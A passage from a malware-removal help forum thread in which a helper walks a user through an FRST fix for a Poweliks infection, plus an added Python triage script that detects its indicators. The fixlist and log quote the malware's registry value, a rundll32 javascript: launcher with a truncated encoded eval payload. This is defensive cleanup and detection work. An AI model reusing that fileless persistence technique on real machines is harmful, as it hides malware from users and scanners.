AlternateDataStreams: C:\Users\JWT\Local Settings:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\Local Settings:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:j995bnd0fUf9E6DMrPOoXHhpj
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:SiOn268klR3MGhq2LXhtpM2gjnMPs
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:N9I8vNxKZhojc6M3zXLVp3
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:YeOaihpQEHsyBGdECvXiSS
Hosts:
  • Save the file to your desktop and name it as fixlist.txt

Note: It's important that both files, FRST.exe/FRST64.exe and fixlist.txt, are in the same location, or the fix will not work.
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system.

  • Run FRST.exe/FRST64.exe and press the Fix button just once and wait
  • If for some reason the tool needs a restart, please make sure you let the system restart normally, then let the tool complete its run
  • When finished, FRST will generate a log (Fixlog.txt) in the same location the tool was run.
  • Please copy and paste the log in your next reply.

--------------
 
To recap, in your next reply I would like to see the following. Make sure to copy & paste them unless I ask otherwise:

  • Fixlog.txt

xXToffeeXx~


~If I am helping you and you have not had a reply from me in two days, please send me a PM~

~Currently in my last year of school, so replies might be more delayed~

 

ID Ransomware - Identify What Ransomware Encrypted Your Files [Support Topic] - If we have helped you out and you want to support what we do, you can do so here

 

 ~Twitter~ | ~Malware Analyst at Emsisoft~
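The fixlist above targets a fileless persistence pattern: a COM CLSID whose LocalServer32 value launches rundll32.exe with a javascript: URL that hands control to mshtml.dll's RunHTMLApplication and eval()s a shift-encoded blob, plus random-named alternate data streams on directories. As an added example (not FRST's code and not from the thread), here is a Python triage helper that scans FRST log lines for those indicators; the sample lines are copied from the fixlist above plus one constructed benign entry with a placeholder CLSID, and the shift-by-one decode is applied only to the truncated prefix quoted in the thread.

```python
"""Triage FRST log lines for the fileless persistence the fixlist above targets:
a COM CLSID whose LocalServer32 value launches rundll32.exe with a javascript:
URL (mshtml.dll RunHTMLApplication + eval of a shift-encoded blob), and the
random-named alternate data streams that the fixlist removes.
Added example for this thread; not FRST's code and not the poster's."""
import re
from dataclasses import dataclass

# Constructed sample input: lines copied from the fixlist above, plus one
# hypothetical benign LocalServer32 entry (placeholder CLSID) for contrast.
SAMPLE_LINES = [
    r'HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...A8F59079A8D5}\localserver32: '
    r'rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";'
    'eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!',
    r'HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION!',
    r'AlternateDataStreams: C:\ProgramData\Microsoft:8S9cANgWAAQ40ucX3IQ1OC5zYd',
    r'AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:j995bnd0fUf9E6DMrPOoXHhpj',
    r'HKCR\CLSID\{00000000-0000-0000-0000-000000000000}\localserver32: "C:\Program Files\Example\app.exe" /automation',
]

LOCALSERVER_RE = re.compile(r'^(?P<key>.*?\\localserver32):\s*(?P<value>.*)$', re.IGNORECASE)
RUNDLL_JS_RE = re.compile(r'rundll32(\.exe)?\s+javascript:', re.IGNORECASE)
EXE_PATH_RE = re.compile(r'\.(exe|dll)\b', re.IGNORECASE)
EVAL_RE = re.compile(r'eval\("(?P<blob>[^"\s]+)')
ADS_RE = re.compile(r'^AlternateDataStreams:\s+(?P<path>[A-Za-z]:\\.*?):(?P<stream>[^:\\]+)$')
RANDOM_NAME_RE = re.compile(r'[A-Za-z0-9]{16,}')  # long alphanumeric name, no extension


@dataclass
class Finding:
    rule: str
    severity: str
    line: str
    detail: str = ''


def decode_shift1(blob: str) -> str:
    """Undo the one-character shift in the eval() argument (each character is
    stored as its successor).  Only the truncated prefix quoted in the thread
    is available, so the decode covers that prefix only."""
    return ''.join(chr(ord(c) - 1) for c in blob)


def triage(lines):
    """Return a Finding for every line that matches one of the three rules."""
    findings = []
    for line in lines:
        m = LOCALSERVER_RE.match(line)
        if m:
            key, value = m.group('key'), m.group('value')
            if RUNDLL_JS_RE.search(value):
                # A legitimate LocalServer32 names an executable on disk; rundll32
                # with a javascript: URL means the COM "server" is script kept in
                # the registry value itself, so there is no file for AV to scan.
                detail = 'LocalServer32 runs rundll32.exe with a javascript: URL (fileless COM hijack)'
                blob = EVAL_RE.search(value)
                if blob:
                    detail += '; eval payload prefix decodes to ' + repr(decode_shift1(blob.group('blob')))
                findings.append(Finding('fileless-clsid-localserver32', 'high', line, detail))
            elif not EXE_PATH_RE.search(value):
                # In this thread the hit is the same CLSID mirrored under
                # HKU\S-1-5-18 (LocalSystem) with no executable path at all;
                # FRST tagged that entry ATTENTION! in the fixlist.
                findings.append(Finding('clsid-localserver32-no-executable', 'medium', line,
                                        'LocalServer32 at ' + key + ' names no executable'))
            continue
        m = ADS_RE.match(line)
        if m and RANDOM_NAME_RE.fullmatch(m.group('stream')):
            # The fixlist removes streams with random-looking names hanging off
            # directories under ProgramData and AppData; flag them for review.
            findings.append(Finding('random-named-ads', 'review', line,
                                    f"stream {m.group('stream')!r} on {m.group('path')}"))
    return findings


if __name__ == '__main__':
    for f in triage(SAMPLE_LINES):
        print(f'[{f.severity:6}] {f.rule}: {f.detail}')
```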


#10 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • Local time:03:16 PM

Posted 30 December 2014 - 04:13 PM

Ok I can do all this momentarily. Is it safe to hook an external or flash drive up to the computer to back up some files? Can I wait on that until after the FRST attempt? Or could this potentially hurt my files? Should I try to transfer my important files to an external drive first? Or would this put the external drive at risk? I am also in the process of changing many passwords.



#11 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • Local time:03:16 PM

Posted 30 December 2014 - 04:26 PM

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 28-12-2014
Ran by JWT at 2014-12-30 15:25:53 Run:1
Running from C:\Users\JWT\Desktop
Loaded Profile: JWT (Available profiles: JWT)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
HKU\S-1-5-18\...A8F59079A8D5}\localserver32:  <==== ATTENTION!
ShellIconOverlayIdentifiers: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive1] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive2] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrive3] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} =>  No File
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&gs_ri={google:suggestRid}&xssi=t&q={searchTerms}&{google:inputType}{google:cursorPosition}{google:currentPageUrl}{google:pageClassification}{google:searchVersion}{google:sessionToken}{google:prefetchQuery}sugkey={google:suggestAPIKeyParameter}
U3 swmidi; No ImagePath
AlternateDataStreams: C:\ProgramData\Microsoft:8S9cANgWAAQ40ucX3IQ1OC5zYd
AlternateDataStreams: C:\ProgramData\Microsoft:KhbmwaIj8jjBmPZ6ss5k5mUEsp
AlternateDataStreams: C:\ProgramData\Microsoft:zMy0bnceFNXIi7v4KfGcGQ
AlternateDataStreams: C:\ProgramData\Microsoft:ZWJJvkiCrYrhz0W4UN6LZ
AlternateDataStreams: C:\Users\JWT\Local Settings:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\Local Settings:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:2etRg9qQ2C2gSOvMuuOR
AlternateDataStreams: C:\Users\JWT\AppData\Local\Application Data:sw6mb3lnyxyihjoAwCkoa
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:j995bnd0fUf9E6DMrPOoXHhpj
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temp:SiOn268klR3MGhq2LXhtpM2gjnMPs
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:N9I8vNxKZhojc6M3zXLVp3
AlternateDataStreams: C:\Users\JWT\AppData\Local\Temporary Internet Files:YeOaihpQEHsyBGdECvXiSS
Hosts:
*****************
 
HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 => Key not found. 
"HKU\S-1-5-21-3865632982-2122395147-3624827403-1002\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKU\S-1-5-18\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key deleted successfully.
"HKU\S-1-5-18\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key deleted successfully.
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => Key deleted successfully.
HKCR\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => Key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => Key deleted successfully.
HKCR\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => Key not found. 
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => Key deleted successfully.
HKCR\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => Key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive1" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A} => Key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive2" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => Key not found. 
"HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ SkyDrive3" => Key deleted successfully.
HKCR\Wow6432Node\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524} => Key not found. 
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value deleted successfully.
Chrome DefaultSuggestURL deleted successfully.
swmidi => Service deleted successfully.
C:\ProgramData\Microsoft => ":8S9cANgWAAQ40ucX3IQ1OC5zYd" ADS removed successfully.
C:\ProgramData\Microsoft => ":KhbmwaIj8jjBmPZ6ss5k5mUEsp" ADS removed successfully.
C:\ProgramData\Microsoft => ":zMy0bnceFNXIi7v4KfGcGQ" ADS removed successfully.
C:\ProgramData\Microsoft => ":ZWJJvkiCrYrhz0W4UN6LZ" ADS removed successfully.
"C:\Users\JWT\Local Settings" => ":2etRg9qQ2C2gSOvMuuOR" ADS not found.
"C:\Users\JWT\Local Settings" => ":sw6mb3lnyxyihjoAwCkoa" ADS not found.
C:\Users\JWT\AppData\Local => ":2etRg9qQ2C2gSOvMuuOR" ADS removed successfully.
C:\Users\JWT\AppData\Local => ":sw6mb3lnyxyihjoAwCkoa" ADS removed successfully.
"C:\Users\JWT\AppData\Local\Application Data" => ":2etRg9qQ2C2gSOvMuuOR" ADS not found.
"C:\Users\JWT\AppData\Local\Application Data" => ":sw6mb3lnyxyihjoAwCkoa" ADS not found.
C:\Users\JWT\AppData\Local\Temp => ":j995bnd0fUf9E6DMrPOoXHhpj" ADS removed successfully.
C:\Users\JWT\AppData\Local\Temp => ":SiOn268klR3MGhq2LXhtpM2gjnMPs" ADS removed successfully.
"C:\Users\JWT\AppData\Local\Temporary Internet Files" => ":N9I8vNxKZhojc6M3zXLVp3" ADS not found.
"C:\Users\JWT\AppData\Local\Temporary Internet Files" => ":YeOaihpQEHsyBGdECvXiSS" ADS not found.
C:\Windows\System32\Drivers\etc\hosts => Moved successfully.
Hosts was reset successfully.
 
==== End of Fixlog 15:25:53 ====


#12 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,015 posts
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:09:16 PM

Posted 01 January 2015 - 03:09 PM

Hi WTTT3,
 

Is it safe to hook an external or flash drive up to the computer to back up some files? Can I wait on that until after the FRST attempt? Or could this potentially hurt my files? Should I try to transfer my important files to an external drive first? Or would this put the external drive at risk?

It is safe to hook up an external/flash drive to the computer; it will not hurt your files in any way. The external drive is safe too.
 
How is your computer running now?
 
xXToffeeXx~




#13 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • Local time:03:16 PM

Posted 01 January 2015 - 03:13 PM

I haven't used the computer for 2 days because I was waiting for a reply after I sent the log. I didn't realize that was supposed to be the fix. I was thinking it was going to be a long process and that I was supposed to keep it off the internet. Should I hook it up to the internet and try to run it normally now?



#14 xXToffeeXx

xXToffeeXx

    Bleepin' Polar Bear


  • Malware Response Instructor
  • 6,015 posts
  • Gender:Female
  • Location:The Arctic Circle
  • Local time:09:16 PM

Posted 01 January 2015 - 03:41 PM

Hi WTTT3,
 
Sometimes the fixing can take a long time, and sometimes not. This infection is not too hard to remove. Yes, use the computer like you would now and see how it is.
 
xXToffeeXx~




#15 WTTT3

WTTT3
  • Topic Starter

  • Members
  • 64 posts
  • Local time:03:16 PM

Posted 02 January 2015 - 09:06 AM

Everything seems to be running smoothly. Thank you so much!





